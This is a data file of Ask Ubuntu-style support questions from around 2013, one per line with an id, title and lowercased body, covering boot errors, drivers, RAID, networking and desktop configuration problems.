394048	`` /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : * : not found '' error when removing kernel packages	i need to install some stuff but it says i need to remove linux kernel image for version 3.11.0-12-generic and linux kernel extra for version 3.11.0-12-generic . please help . miles @ ubuntu-pc : ~ $ sudo apt-get install -f [ sudo ] password for miles : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 183 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 185492 files and directories currently installed . ) removing linux-image-extra-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : splash : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : splash : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-12-generic linux-image-3.11.0-12-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=3 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default=âquiet splash profileâ grub_cmdline_linux= '' ''
394050	rc.local not executing command	i was trying to make my laptop running ubuntu 13.10 remember the brightness from the last time and set it automatically on start-up . i was thinking about using xbacklight to set the brightness . so , as a test run i added xbacklight -set 100 inside /etc/rc.local . but simply it does n't work . permission for my rc.local is : -rwxr-xr-x 1 root root 338 dec 22 00:08 rc.local i also tried adding sleep 60 considering its a timing issue . but still no luck .
394053	how to change the account profile picture on xubuntu	so , i 've installed xubuntu on my computer and changed the user image ( created a 96x96 .jpg and placed it in the home folder with the name .face ) . now i want to use a new image but the .face file disapeared ! when i try to place a new file in the folder a get a message saying there 's already a file with that name . any help would be great . thanks !
394057	ubuntu 13.04 not responding	i 'm running multiple process simultaneously and then the system not responding . not even showing the 'force quit ' dialog . what i 'm doing is switching to tty to reboot the system , or to execute kill -9 -1 , when kill command executed screen looking weired for few seconds then logging off . is there any terminal command to make system responsive again without rebooting or logging off ?
394061	why is ubuntu music streaming not available for android , except for google play ?	why is ubuntu music streaming not available for android , except for google play ? i was looking for it on f-droid and it ca n't be found . ironically , ubuntu seems to suggest only google play - why does n't ubuntu support the open-source app store for android ? is there any officially recommended way to install the ubuntu music app for those of us that uninstalled google play , or are we supposed to find and compile the source ?
394062	running thinkorswim	i just started using ubuntu , and yesterday i managed to install thinkorswim software on my desktop . it was working yesterday , but now it does n't work . i click it and nothing happens . also the icon has changed to just a plain folder . other than going into settings i do n't know what else to try . how do i get this back working ?
394065	on lubuntu i ca n't create new panel	on the bottom layer in lubuntu when i do a right click , icon of create new panel is grayed out.what to do about it ?
394067	why use sticky bit ?	`` the sticky bit applies only to directories , and is typically used on publicly-writeable directories . within a directory upon which the sticky bit is applied , users are prevented from deleting or renaming any files that they do not personally own . '' does this mean if i run the following : // only allow other users to read files in /directory sudo chmod o-w -r /directory sudo chmod o-x -r /directory sudo chmod o+r -r /directory users can still delete or rename any file that does not belong to them ?
394069	no data sources available nexus 7	i am trying to install saucy-preinstalled-armel+grouper.zip and saucy-preinstalled-phablet-armhf.zip they install successfully but when i reboot i get a screen that has a circle that says , `` no data sources available '' i have searched google to find http : //forum.xda-developers.com/showthread.php ? t=2538219 which is for the nexus 4 and does n't solve the problem . is there a way to install ubuntu touch through clockworkmod touch recovery ? is multirom necessary in this scenario ? thanks in advance
394070	kubuntu 's tty resolution too low after installing nvidia-current	after installing kubuntu on a notebook with geforce go 6100 graphics card , the tty 's were working correctly , but the kde desktop would n't display anything correctly . after installing the nvidia driver using apt-get install nvidia-current as root , the kde desktop was displayed correctly . but now the tty 's have a very low resolution ( the font is about 4x as big as it 's supposed to be ) and the flashing kubuntu plymouth-animation was replaced by a text based animation looking like this : kubuntu 13.10 . . . . . where the dot 's were changing it 's color like on ubuntu ( not kubuntu ) bootup . what happened and how can i fix it ?
394072	error adding yafray addon to blender 2.69	i ca n't install yafray addon to blender 2.69 . i go to user preferences , addons and when i select the file yafray.zip , the blender showed me an error message . can anyone help me ?
394073	monitor turning off randomly . [ workaround exists ]	i installed ubuntu 13.04 on a machine with pre-installed windows 8 using the options acpi_osi=linux acpi_backlight=vendor i was unable to change the brightness of the system using the function keys . it was always at a max . value of 5273 ( checked in /sys/class/backlight/intel_backlight/brightness . i edited the file with a value of 400 . the screen goes blank in the following scenarios : when i start the system . when i leave it idle for a few seconds . when i try to increase the brightness using keyboard shortcuts . the workaround for me is to close the lid of my laptop and wait for it to suspend then when i open it again , the desktop appears again . it is usually in a terminal saying something like `` writing to a register failed '' . before i can read it completely , the screen appears . is there anyway to fix this issue . i 've a feeling it has got something to do with my graphics card . my laptop is lenovo y410p ideapad .
394075	ubuntu 12.04 , software center , opening applications	in my first computer i clicked on software center , scrolled to libreoffice base and made 1 click to open base ( as i recall ) . on my 2nd computer i clicked on software center , scrolled to libreoffice base and a click brought up 'available from the `` main '' source ' . what did i do wrong and how do i open applications in the software center ? ( no terminal scripts ) . the same cd loaded both systems . this edit is to say i just remembered my 1st computer was on line and the 2nd was not . when i got the 2nd computer on line the application loaded ok . i do not know the procedure for responding to the answeres so let me say they are appreciated .
394077	why do i have to push my gpg key to ubuntu key server before using launchpad ?	i am just starting to explore about launchpad package upload , .deb packaging and gpg keys . one thing that bothers me is that why do i have to upload/push my gpg key to ubuntu 's keyserver before using launchpad ?
394078	tmp folder fills up my drives , how to cap it ?	i 'm running an application that generates a lot of data . roughly 6gb every other minute , to handle it i have a 2x3tb raid0 set up . however , my tmp directory also fill up with .tmp files that are about the same size . it fills the ssd i 'm running ubuntu on fairly quickly , it 'll most likely get purged when i reboot , but i have no interest in keeping such big tmp-files . is there a way to limit the size of the tmp dir ? let 's say i 'll want to allow it to fill my drive to 95 % and then have it automatically delete files bigger than say 1mb . is there some smart utility to control this ? i 'm on ubuntu 12.04 lts
394079	console streaming client for icecast	i need a console streaming client for icecast which allows me to use dynamic playlists and can play mp3 . ices2 support dynamic playlists but it plays ogg only , it does not support mp3 files .
394081	blender closes alone in ubuntu 13:10	i installed blender 2.69 via ppa in ubuntu saucy salamander he closes anytime when i am using it . i was wondering if anyone has gone through this , was it because of the ppa ?
394083	`wc`-like command to count keystrokes	i need ( in future regularly ) to count the keystrokes ( german : anschl채ge ) of existing texts . this is not about calculating typing speed , but i need to calculate the length of the texts in `` norm pages '' . these `` keystrokes '' differ from normal character count in that uppercase letters are counted as two keystrokes , and so are all characters that require shift to be produced on a standard keyboard layout ( space , tab , enter/eol count as one keystroke as well ) . before writing a script on my own : is there anything like `` wc -- keystroke '' around ?
394085	hdmi video not working in ubuntu 13.10	some time ago i bought a new pc w/ geforce gtx660 , which i connect to the monitor with hdmi cable ( i dual boot , and it works great under windows ) . i installed nvidia-current and when i boot into ubuntu i see my usual desktop , but i do n't see logging prompt and it 's overall buggy ( and because i ca n't get to log in , i ca n't use it ) , however when i boot from ubuntu live-usb it 's working as it should . for now i 'm stuck with igfx and a vga cable , but i would love to know how to get it to working .
394086	ca n't connect to certain sites	i 've been having an odd issue for months ( 8-12 ? ) now , and i 'm out of ideas . i own a site , hosted by godaddy , that i ca n't connect to only from my ubuntu laptops . i have two ( ubuntu 12.04.3 lts and ubuntu 13.10 ) laptops , and i ca n't connect to the site using chrome , ff , or even wget . windows machines , ios devices , and even raspberry pis can access it just fine . wired or wireless makes no difference . this seems to be a port 80 issue , as i can ssh into the host from my ubuntu laptops . i can connect to the site on the laptops when connected via my work vpn . i figured a pi ( running raspbian ) would make a good comparison , so here are some of the things i 've done , comparing the laptops to the pi : traceroute is identical ( times out after hop 14 , i.e. , * * * for lines 15 - 30 ) . last hop is to be38.trmc0215-01.ars.mgmt.phx3.gdg ( 184.168.0.69 ) ping is identically successful wget on the laptops eventually just eventually gives me `` failed : connection timed out . '' the pi retrieves the page normally . i noticed that the laptops had 127.0.0.1 as the nameserver in /etc/resolv.conf , whereas the pi had my router ( 192.168.1.1 ) . i turned off dnsmasq on one of the laptops , rebooted , and now it also shows 192.168.1.1 , but no effect . ( should i turn it back on ? ) the site is not referenced in any of the /etc/hosts files . telneting to port 80 succeeds immediately on the pi , but on the laptops it times out ( `` telnet : unable to connect to remote host : connection timed out '' ) other possibly relevant info : my router is running dd-wrt . isp is time warner . pi @ pi1 -bash ~ $ cat /etc/os-release pretty_name= '' raspbian gnu/linux 7 ( wheezy ) '' name= '' raspbian gnu/linux '' version_id= '' 7 '' version= '' 7 ( wheezy ) '' id=raspbian id_like=debian joe @ joe-linlaptop bash ~ $ cat /etc/os-release name= '' ubuntu '' version= '' 12.04.3 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu joe @ inspiron -bash ~ $ cat /etc/os-release name= '' ubuntu '' version= '' 13.10 , saucy salamander '' id=ubuntu id_like=debian pretty_name= '' ubuntu 13.10 '' version_id= '' 13.10 '' valid subdomains show the same symptoms as www ( timing out ) . invalid domains fail immediately . any help will be greatly appreciated ! let me know what other information i should post , as i 'm sure i 've left some important details out âş
394088	tell kde to store network secret in unencrypted file via commandline	i have run into a situation where i 'd like to get my wireless working without the benefit of a monitor , by sshing in . i have kde on the system , have enabled autologin for one of the users and would now like to set up the wireless to automatically connect without kwallet prompting me for a password . ( that way i can ditch my ethernet cable and move my computer out of the way ) . i assume that this requires me to store the password in an unencrypted file ; that 's just fine with me . i 've run across some ways to do that via the gui ( such as this solution ) but , for my circumstances , i need to be able to pull this off via ssh . would anyone know how to accomplish this ? it would be much appreciated .
394092	address already in use error when trying to run jetty with ubuntu server	i am still trying to make jetty work . now , i removed ubuntu desktop and installed ubuntu server and i installed java and jetty . when i try to run jetty $ ~/jetty/jetty-dist/bin ./jetty.sh start i get address already in use error ( from the logs below ) . i tried to kill all pid on port 22 as suggested here and tried to run jetty again but i got the same error . what is wrong ? 2013-12-21 14:35:01.480 : warn : oejuc.abstractlifecycle : main : failed org.eclipse.jetty.server.server @ 22549f54 : java.net.bindexception : address already in use java.net.bindexception : address already in use at sun.nio.ch.net.bind0 ( native method ) at sun.nio.ch.net.bind ( net.java:444 ) at sun.nio.ch.net.bind ( net.java:436 ) at sun.nio.ch.serversocketchannelimpl.bind ( serversocketchannelimpl.java:214 ) at sun.nio.ch.serversocketadaptor.bind ( serversocketadaptor.java:74 ) at org.eclipse.jetty.server.serverconnector.open ( serverconnector.java:279 ) at org.eclipse.jetty.server.abstractnetworkconnector.dostart ( abstractnetworkconnector.java:80 ) at org.eclipse.jetty.server.serverconnector.dostart ( serverconnector.java:218 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:69 ) at org.eclipse.jetty.server.server.dostart ( server.java:336 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:69 ) at org.eclipse.jetty.xml.xmlconfiguration $ 1.run ( xmlconfiguration.java:1250 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.jetty.xml.xmlconfiguration.main ( xmlconfiguration.java:1174 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.jetty.start.main.invokemain ( main.java:297 ) at org.eclipse.jetty.start.main.start ( main.java:706 ) at org.eclipse.jetty.start.main.main ( main.java:103 ) java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.jetty.start.main.invokemain ( main.java:297 ) at org.eclipse.jetty.start.main.start ( main.java:706 ) at org.eclipse.jetty.start.main.main ( main.java:103 ) caused by : java.net.bindexception : address already in use at sun.nio.ch.net.bind0 ( native method ) at sun.nio.ch.net.bind ( net.java:444 ) at sun.nio.ch.net.bind ( net.java:436 ) at sun.nio.ch.serversocketchannelimpl.bind ( serversocketchannelimpl.java:214 ) at sun.nio.ch.serversocketadaptor.bind ( serversocketadaptor.java:74 ) at org.eclipse.jetty.server.serverconnector.open ( serverconnector.java:279 ) at org.eclipse.jetty.server.abstractnetworkconnector.dostart ( abstractnetworkconnector.java:80 ) at org.eclipse.jetty.server.serverconnector.dostart ( serverconnector.java:218 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:69 ) at org.eclipse.jetty.server.server.dostart ( server.java:336 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:69 ) at org.eclipse.jetty.xml.xmlconfiguration $ 1.run ( xmlconfiguration.java:1250 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.jetty.xml.xmlconfiguration.main ( xmlconfiguration.java:1174 ) ... 7 more usage : java -jar start.jar [ options ] [ properties ] [ configs ] java -jar start.jar -- help # for more information
394095	full screen apps get all muddled in vmware player	i 'm running windows 7 that 's running vmware player that is running ubuntu 13.10 . now everything is working perfectly apart from the full screen apps . in ubuntu , i make apps full screen , and that 's all great , but if i need to hop into windows for a second , i minimize vmware player , and when i maximize it again , in ubuntu all of my windows have jumped into different places . it 's really , really annoying . any ideas how to stop this ? it 's wasting me so much time .
394097	problem switching languages [ ubuntu 12.04 lts ]	how can i switch languages using a keyboard shortcut ? i can only switch them using mouse .
394100	where can i get older versions of lubuntu ?	i have an old compaq nc6000 computer , and the newest kernels do n't work . i need to use an older version of lubuntu . where can i download the older versions lf lubuntu ?
394105	how to resize partition that is inside `` linux lvm '' partition	how to resize partition that is inside `` linux lvm '' partition in 13.10 ubuntu ? i transferred ubuntu installation from 160gb to 500gb disk . i have successfully resized sda3 partition using ubuntu livecd and gparted and now have no idea how to resize this `` 155 gb block device '' . here is how it looks like . thanks , igor
394108	pendrive not able to access	hello when i am putting in my pendrive its showing an icon on left side of home window but i am not able to access it . when using fdisk command it shows : anish @ anish-hp-pavilion-dv2000-rz893pa-acj : ~ $ sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00028519 device boot start end blocks id system /dev/sda1 * 2048 229220351 114609152 83 linux /dev/sda2 229222398 234440703 2609153 5 extended /dev/sda5 229222400 234440703 2609152 82 linux swap / solaris disk /dev/sdc : 8076 mb , 8076132352 bytes 222 heads , 8 sectors/track , 8881 cylinders , total 15773696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000c46c device boot start end blocks id system /dev/sdc1 * 2048 15773695 7885824 b w95 fat32 using mount it shows anish @ anish-hp-pavilion-dv2000-rz893pa-acj : ~ $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/anish/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=anish ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) /dev/sdb on /mnt/sda1 type tmpfs ( rw ) /dev/sdb1 on /mnt/sda1 type vfat ( rw )
394109	can you use ubuntu server as a router and a pxe server at the same time ?	yesterday , i used this guide to set up my ubuntu server installation as a router with a simple firewall . i was able to access the internet , but after i installed a pxe server along with the router using this guide to network boot ubuntu desktop , i could n't access the internet anymore . ( i can still open webmin and ssh to the server , though ) . right now , i have to choices : either boot the local hard drive to access the internet , or boot from the pxe server and have no internet . i want to be able to boot from the pxe server and still have access to the router part . is this possible ? note : the nic card i 'm using to network boot is the same one as the lan side of the router .
394110	installing ubuntu 12.04.3	i have downloaded ubuntu 12.04.3 but how do i install it ? i have attempted to open the download but nothing happens . i am currently running fedora .
394115	startup jumping	i have installed xubuntu 12.04 on my son 's laptop . at startup it opens in emulator asking for login and password . after i enter these it asks for these again . i restart and it opens normal . i 'm new to this and could use some help . thanks keith
394119	belkin f7d1102 n150/surf micro wireless adapter- connectivity problems	the network manager keeps prompting me for a password , while i 'm sure it 's correct . sometimes it connects for a minute . when i used windows 8 at the same place with the same router , i did n't have this connection problems . apparently someone has filed a bug already ( bugs.launchpad.net/ubuntu/+bug/1244408 ? comments=all ) . as stated in the title the model my belkin wifi adapter is f7d1102 n150/surf micro with rtl8188cus chipset ( more information about device ) wikidevi.com/wiki/belkin_f7d1102 . i 'm using a recently updated kubuntu 13.10 installation . when i type lsusb and lsmod in the terminal , i got the following output : bus 006 device 002 : id 050d:1102 belkin components f7d1102 n150/surf micro wireless adapter v1000 [ realtek rtl8188cus ] module size used by rtl8192cu 67723 0 rtl_usb 18448 1 rtl8192cu rtlwifi 63229 2 rtl_usb , rtl8192cu rtl8192c_common 48877 1 rtl8192cu mac80211 596969 3 rtl_usb , rtlwifi , rtl8192cu cfg80211 479757 2 mac80211 , rtlwifi dmesg | grep firmware gives : [ 61.782478 ] rtl8192cu : loading firmware rtlwifi/rtl8192cufw.bin i tried several solutions to my connection problems : compilation of driver provided by realtek : i searched for the rtl8188cus driver on realtek 's website and tried to compile it myself using the install script . when executing the script , sudo make driverfills my screen with a repeating error : implicit declaration of function ? installation of windows drivers on cd with nsdiswrapper blacklisted original driver . windows driver does n't work . ( solution ) patched version of original driver ( ubuntu 13.10 ) meanwhile i found at that someone has patched the original rtl8192cu driver link and it works !
394125	how do i change the input method in guest session ?	i like the concept of having a guest account on the computer , but one thing i would like to know is , if the guest account is customizable ? particularly the language input settings ?
394126	infinality problem with fonts in firefox	just installed infinality in 13.10 from ppa : no1wantdthisname/ppa . and got problem with fonts in firefox . so when choose page source option in firefox there is no any text inside window . also on some sites whole areas of text dissapear .
394130	how to remove transparency from search interface ?	the search interface of ubuntu search has a strong transparency . however , if there is any window open on the current workspace , the ubuntu search interface is pretty hard to use read , because the applications below shine through . how can i change the appearance of ubuntu search and remove this annoying transparency ? unity tweak tool does not seem to have an setting for that . any hint is much appreciated .
394135	how do i move past a stuck pam configuration on ubuntu-pushed update ?	i am on ubuntu 13.10 ( probably have been upgrading since ubuntu 10 ) . on a routine suggested update of a bunch of things including libkleo4 , libkpgp4 , libmessagecore4 , girl.2-gudev1.0 , kde-config-primactivity , konsolekalendar , etc . it sets up libsystemd-daemon0 : amd64 , systemd-services , and then starts on libpam-systemd : amd64 ( 204-0ubuntu19.1 ) â and that 's where we get stuck . the debconf window opens for pam configuration and says : no pam profiles have been selected for use on this system . this would grant all users access without authenticating , and is not allowed . please select at least one pam profile from the available list . the problem is , no matter what i check ( or do n't check ) from the list below and press forward , it does n't move forward . the options to check are `` unix authentication '' , `` winbind nt/active directory authentication '' , `` register user sessions in the systemd control group hierarchy '' , `` gnome keyring daemon - login keyring management '' , `` consolekit session management '' , and `` inheritable capabilities management '' . i do n't know if i use or need pam anything , but i would like to be able to complete recommended updates ! this is the second time an update has frozen here . advice ?
394139	what makes mysql service autostart , while it 's disabled in bootup-manager ?	the mysql service is not enabled in bootup-manager , yet it is working after system starts . is it awaken by another service ? how to determine what causes that ? edit fix as instructed here .
394141	how to install social engineering toolkit ?	when i searched for the social engineering toolkit i got the error `` no such path or file '' . i used this orders for installing it but without success . be sure to install subversion before installing the selected tools . ( i did it ) svn co http : //svn.secmaniac.com/social_engineering_toolkit set/ and the link is not working anymore .
394142	rhythmbox with disabled global appmenu	i disabled global appmenu and i 'm now using gnome shell instead of unity . my giant love to rhytmbox fails , because it do n't show menu : ( how i can return classic menu ? recompile from sources ? maybe simple answer exist ? $ lsb_release -sir ubuntu 13.10 $ gnome-shell -- version gnome shell 3.8.4 screenshot ( polish language ) : rhythmbox version is 2.99.1-0ubuntu1
394143	what are the advantages and disadvantages of installing 12.04 or 13.10 ?	i am now reinstalling my ubuntu from 32-bit 12.04 to a 64-bit version , because my 2gb ram is too small and i just bought 2x4gb ram . i have to choose which version to install . what are the advantages and disadvantages of installing 64-bit 12.04 or 64-bit 13.10 ? i know 12.04 is lts , and 13.10 have new features that i have no idea of . are the new features of 13.10 worth to try compared to its short supporting period till summer 2014 ? here are my considerations : my laptop is lenovo t400 , not a new model . i plan to use my laptop to study for a computer science master degree . i hope the version can be less memory/cpu consuming , and support as many convenient applications and tools ( such as for programming , documents ( pdf , djvu ) ) as possible . i do n't reinstall my os frequently until i have to . which version of ubuntu do you suggest me to install , if you were me ? shall i replace my ram from 2gb to 2x4gb first or reinstall 64-bit ubuntu first ? thanks !
394149	macbook pro 9.2 , trying to single install ubuntu . encountering problems after restart	just in case you are wondering , i am asking this from `` try ubuntu without installing '' . this is where i 'm at : i have a macbook pro 9.2 ( according to terminal ) . i have completely got rid of mac os x ( personal files backed up on ubuntu one ) . i have done an install of ubuntu 12.04 from a dvd that i mounted the .iso file onto . after advice from another post , i made a point of partitioning the 500gb hard drive as follows : dev/sda1 : fat32 size - 953mb . used : 3.94mb . flags : boot dev/sda2 : linux-swap size - 7.45gb . used : -- flags : -- dev/sda3 : ext4 size - 37.25gb . used : 3.81gb flags : -- dev/sda4 : ext4 size - 420.13gb . used : 6.80gb flags : -- when doing the partitioning i intended to make sda4 a /home thing . also it recommended creating a efi boot thing . this i believe to be sda1 . so i completed the installation , and no issues/errors were presented . at the end of it , the system told me to restart . so i pressed `` restart now '' ( only option ) . subsequently it told me to remove the installation media and hit enter , i obliged . it then restarted , and i got a white screen ( typical of an os x boot up ) . after a while it came up with a blinking file logo , indicating that it has not found the operating system ? ? ? anyone got any clues ? thanks : )
394150	mouse wo n't work	i 'm new to ubuntu , but when i tried to load it off a usb drive , my trackpad wo n't work , nor will the buttons . i 've tried to look it up , but nothing has worked so far . if i need to get into a folder , it has to be accessible from the terminal , since i do n't have access to an external mouse . any and all help is appreciated .
394151	is there a way to get a list of deleted files ?	i tend to delete files often as i reorganize my hard drive . generally , i trust myself enough that i do n't think about emptying the trash can . rarely , i do have doubts on whether i should 've emptied that trash can or not . is there a way to check for a list of recently deleted files ? i 'm not looking for recovery , necessarily , just for file names . tia !
394152	how to fix : usb gsm modem entry randomly ( ? ) disappears from networks list ?	when this happen , active connection is no longer active and i do not see usb gsm modem entry on the networks list ( it is called `` mobile broadband '' in english i guess ) , exactly as the modem would be disconnected from the computer . but it ai n't and even is blinking happily in cyber joy . i 'm pretty sure that sometime there may be a signal problem , but then why system is denying modem existence instead of just tell me that there is no available connection ? huawei e173 modem is connected via ~4m one-end hub instead of antenna & signal loss . driven by option driver by default . it seems not depending on active data transfer . happens ~once each day .
394153	software raid resync does not work with new harddrive	after a harddrive failure , i tried to resync the existing software raid . i copied the partitionstructure sgdisk -r /dev/sdb /dev/sda sgdisk -g /dev/sdb and added the drive back to the volumes mdadm /dev/md0 -a /dev/sdb1 mdadm /dev/md1 -a /dev/sdb2 mdadm /dev/md2 -a /dev/sdb3 md0 and md1 are syncing properly but the main data partition md2 failes . personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdb1 [ 2 ] sda1 [ 0 ] 16768896 blocks super 1.2 [ 2/2 ] [ uu ] md2 : active raid1 sdb3 [ 2 ] sda3 [ 0 ] 2912831744 blocks super 1.2 [ 2/1 ] [ u_ ] [ > ... ... ... ... ... ... .. ] recovery = 1.0 % ( 31483008/2912831744 ) finish=297.5min speed=161368k/sec md1 : active raid1 sdb2 [ 2 ] sda2 [ 0 ] 523968 blocks super 1.2 [ 2/2 ] [ uu ] somewhere in the middle recovery stops / fails , and i do n't have a clue why . any ideas how to find out what the problem is ?
394158	ubuntu 12.04 failed to boot after update	i performed an update yesterday and it installed fine . i shut down my computer like normal and when i tried to boot it up , it never did . it flashed a message real quick and then it just stays on a black screen . message : could not write bytes : broken pipe any ideas on what is going on and how can i fix this ? thanks . update : so i ran ubuntu from a usb . backed up all my stuff and reinstalled it . i ran the updates again and everything worked . then i updated the nvidia driver package and it did it again . it looks like there something wrong with the last update on this package . hopefully someone can fix this .
394159	belkin n600 usb wireless adapter on ubuntu 12.04	i have an old compaq desktop that my children use to access the internet . the kids have repeatedly managed to severely infect the computer with viruses , and this latest round has been a doozy . a friend recently sold me on ubuntu as a great windows replacement since it is not prone to viruses , so i decided to to give it a go . i completely overwrote windows with ubuntu 12.04 to get rid of the viruses , but i can not figure out how to make the wireless network dongle work . i have googled the topic and tried to go through some of the solutions , but i do n't know what i 'm doing and i think i may be making things worse . can someone help me with this ? i know nothing about linux and most of the instructions are n't written for someone like me . thanks , lsusb gives the following : bus 001 device 004 : id 050d:615a belkin components f7d4101 / f9l1101 802.11abgn wireless adapter [ broadcom bcm4323 ] bus 005 device 002 : id 045e:0040 microsoft corp. wheel mouse optical bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub thanks for helping me with this chili !
394162	does unity interface relate to unity3d ?	they share the same name , if they do n't relate to each other than do they have copyright conflicts between each other ?
394163	wifi not getting activated after logging via terminal	i have an intel hd gpu . after getting into recovery mode , when i do nomodeset i get a blinking cursor and then i press ctrl-alt-f1 to get terminal.the problem is that my wifi does not get activated upon logging in via terminal .
394164	configure gwibber for twitter	i wanted to use gwibber for both facebook as well as for twitter . while i have configured properly for facebook , i am unable to do so for twitter . after giving add account , selecting twitter and authorizing , the following page opens ( which is blank ) and then nothing . how to resolve this problem ?
394165	ubuntu 12.04 : no wireless after install	i just installed ubuntu 12.04 on my computer and there was no wifi available or loaded when it opened for the first time . i had come down from ubuntu 13.10 and the wireless there worked fine . the wireless card is the intel 7260 ac . the firmware file i found for it is : wlwifi-7260-ucode-22.1.7.0.tgz but what the alternative installer asked for was wlwifi-7260-ucode-22.1.6.0.tgz , with the 6 , not the 7 , so it has to exist ? ? ? i looked through some backports and the internet , and did n't find that particular versino . i even changed the file name to see if it would work but it did n't . anyone know where this file is or how to get it to work ?
394167	mouse is not precise and click is unpredictable in dell inspiron n5110	i have n5110 and ubuntu 13.04 . my mouse is not precise . it clicks randomly . when i place mouse pointer at one point it clicks to another ( most of the time to the previous target ; sometimes even target in other window ) . the problem is same even with usb mouse . i get following information on xinput command . ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys
394168	where to write java programs on ubuntu ?	i want on write java programs on ubuntu . i have java on my windows os and i write programs in notepad++ and compile and run it in command prompt . i installed java on ubuntu . what should i use to write programs ? thank you .
